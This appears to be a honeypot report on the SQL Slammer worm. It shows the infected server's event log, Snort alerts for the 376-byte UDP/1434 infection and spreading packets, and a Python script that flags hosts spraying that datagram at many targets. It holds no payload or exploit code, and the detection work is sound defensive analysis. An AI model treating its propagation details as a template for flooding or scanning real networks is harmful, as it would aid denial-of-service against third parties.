MS-SQL Server Worm (also called Sapphire, SQL Slammer, SQL Hell)


Infection sequence:
  1. The honeypot started the MS SQL server at 11:20:55.

  2. At 20:00:48, it was infected by a 376 byte long UDP packet to port 1434.

  3. From then on, the infected honeypot sent 376 byte long UDP packets to port 1434 at random targets at a very high rate. Vulnerable systems also start sending identical 376 byte packets immediately once they are infected. The worm sends traffic to random IPs, including multicast IPs, which may improve its Denial of Service (DoS) capability.

According to SANS, a single MS-SQL server has been reported to generate traffic in excess of 50 Mbit/sec after being infected. Such DoS capability causes link degradation; as a result, root DNS servers and other resources have been unavailable at times. The event log recorded on the honeypot:

The honeypot started the MS SQL server at 11:20:55:

Sep 16 11:20:45 honey3 Eventlog to Syslog Service Started: Version 3.4
Sep 16 11:20:55 honey3 MSSQLSERVER: N/A: 17052 : Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 3)
Sep 16 11:20:55 honey3 MSSQLSERVER: N/A: 17104 : Server Process ID is 744.
Sep 16 11:20:55 honey3 MSSQLSERVER: N/A: 17124 : SQL Server configured for thread mode processing.
Sep 16 11:20:55 honey3 MSSQLSERVER: N/A: 17125 : Using dynamic lock allocation. [2500] Lock Blocks, [5000] Lock Owner Blocks.
Sep 16 11:20:55 honey3 MSSQLSERVER: N/A: 17162 : SQL Server is starting at priority class 'normal'(1 CPU detected).
Sep 16 11:21:00 honey3 Distributed Link Tracking Client: N/A: The volume ID for E: has been reset, since it was a duplicate of that on C:. This volume ID is used by Distributed Link Tracking to automatically repair file links, such as Shell Shortcuts and OLE links, when for some reason those links become broken.
Sep 16 11:21:05 honey3 Microsoft Search: N/A: The Search service has started.
Sep 16 11:21:15 honey3 MSSQLSERVER: N/A: 17834 : Using 'SSNETLIB.DLL' version '8.0.194'.
Sep 16 11:21:20 honey3 MSSQLSERVER: N/A: 17052 : Recovery complete.
Sep 16 11:21:20 honey3 MSSQLSERVER: N/A: 17126 : SQL Server is ready for client connections
Sep 16 11:21:20 honey3 MSSQLSERVER: N/A: 19013 : SQL server listening on 192.168.20.3:1433, 127.0.0.1:1433.
Sep 16 11:21:20 honey3 MSSQLSERVER: N/A: 19013 : SQL server listening on TCP, Shared Memory, Named Pipes.
Sep 16 11:21:20 honey3 MSSQLServer: N/A: SuperSocket info: (SpnRegister) : Error 1355.

At 20:00:48, the honeypot was infected by a 376 byte long UDP packet to port 1434 and immediately began sending identical 376 byte packets itself (Snort alerts):

09/16-20:00:48.854154 213.112.161.133:1401 -> 192.168.20.3:1434
UDP TTL:105 TOS:0x0 ID:2838 IpLen:20 DgmLen:404
Len: 376
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
09/16-20:00:48.871355 192.168.20.3:1034 -> 89.146.178.104:1434
UDP TTL:128 TOS:0x0 ID:482 IpLen:20 DgmLen:404
Len: 376
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
09/16-20:00:48.871397 192.168.20.3:1034 -> 25.231.4.116:1434
UDP TTL:128 TOS:0x0 ID:483 IpLen:20 DgmLen:404
Len: 376

The worm signature

09/16-20:00:48.854154 213.112.161.133:1401 -> 192.168.20.3:1434
UDP TTL:105 TOS:0x0 ID:2838 IpLen:20 DgmLen:404
Len: 376
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
09/16-20:00:48.871355 192.168.20.3:1034 -> 89.146.178.104:1434
UDP TTL:128 TOS:0x0 ID:482 IpLen:20 DgmLen:404
Len: 376

In the packet capture, the infected honeypot was sending 376 byte long UDP packets to port 1434 at random targets at a very high rate.

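An added detection example (not part of this honeypot report): it parses tcpdump summary lines in the format of the capture above and flags any host that fires the worm's fixed-size 376 byte UDP/1434 datagram at several distinct targets in a burst, which is the propagation pattern described in step 3 and the source of the link-saturating traffic noted by SANS. The sample capture is constructed (the honeypot address is the one from this page, the random targets are documentation addresses), and the thresholds are set low to suit the small sample.

```python
import re
from collections import defaultdict

# Constructed sample in the tcpdump format of the capture above: the honeypot
# address is the page's, the random targets are documentation addresses.
SAMPLE_TCPDUMP = """\
20:00:48.854154 203.0.113.7.1401 > 192.168.20.3.1434: udp 376
20:00:48.870997 arp who-has 192.168.20.254 tell 192.168.20.3
20:00:48.871355 192.168.20.3.1034 > 198.51.100.4.1434: udp 376
20:00:48.871397 192.168.20.3.1034 > 198.51.100.116.1434: udp 376
20:00:48.871429 192.168.20.3.1034 > 203.0.113.46.1434: udp 376
20:00:48.871468 192.168.20.3.1034 > 192.0.2.52.1434: udp 376
20:00:48.871502 192.168.20.3.1034 > 192.0.2.31.1434: udp 376
20:00:49.120000 192.168.20.3.1035 > 192.0.2.53.53: udp 45
"""

# tcpdump UDP summary line: "HH:MM:SS.usec src.sport > dst.dport: udp len"
UDP_LINE = re.compile(
    r"^(\d\d):(\d\d):(\d\d)\.(\d{6}) (\d+\.\d+\.\d+\.\d+)\.(\d+) > "
    r"(\d+\.\d+\.\d+\.\d+)\.(\d+): udp (\d+)$")
SLAMMER_PORT, SLAMMER_LEN = 1434, 376   # fixed worm datagram seen above

def parse_udp(line):
    """Return (seconds, src, dst, dport, udp_len), or None for other lines."""
    m = UDP_LINE.match(line)
    if not m:
        return None
    h, mi, s, us, src, _sport, dst, dport, ulen = m.groups()
    t = int(h) * 3600 + int(mi) * 60 + int(s) + int(us) / 1e6
    return t, src, dst, int(dport), int(ulen)

def find_slammer_sources(capture, min_packets=3, min_targets=3):
    """Flag hosts firing the worm's 376-byte UDP/1434 datagram in a burst.
    One source hitting many distinct targets with the fixed-size datagram is
    the propagation pattern the infected honeypot showed, not client traffic."""
    per_src = defaultdict(list)
    for line in capture.splitlines():
        rec = parse_udp(line)
        if rec and rec[3] == SLAMMER_PORT and rec[4] == SLAMMER_LEN:
            per_src[rec[1]].append((rec[0], rec[2]))
    report = {}
    for src, pkts in per_src.items():
        targets = {dst for _, dst in pkts}
        if len(pkts) >= min_packets and len(targets) >= min_targets:
            span = pkts[-1][0] - pkts[0][0]        # burst duration, seconds
            pps = len(pkts) / span if span > 0 else float("inf")
            report[src] = {"packets": len(pkts), "targets": len(targets),
                           "burst_pps": round(pps)}
    return report
```

The single inbound infection packet from the remote source is not flagged, only the honeypot's outbound burst is; on a full capture, raise the thresholds to match the rate you consider abnormal for your network.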

As of Oct 2003, our IDS still picks up some MS-SQL worm traffic.


References:

http://www.cert.org/advisories/CA-2003-04.html
http://www.techie.hopto.org/sqlworm.html
http://isc.incidents.org/analysis.html?id=180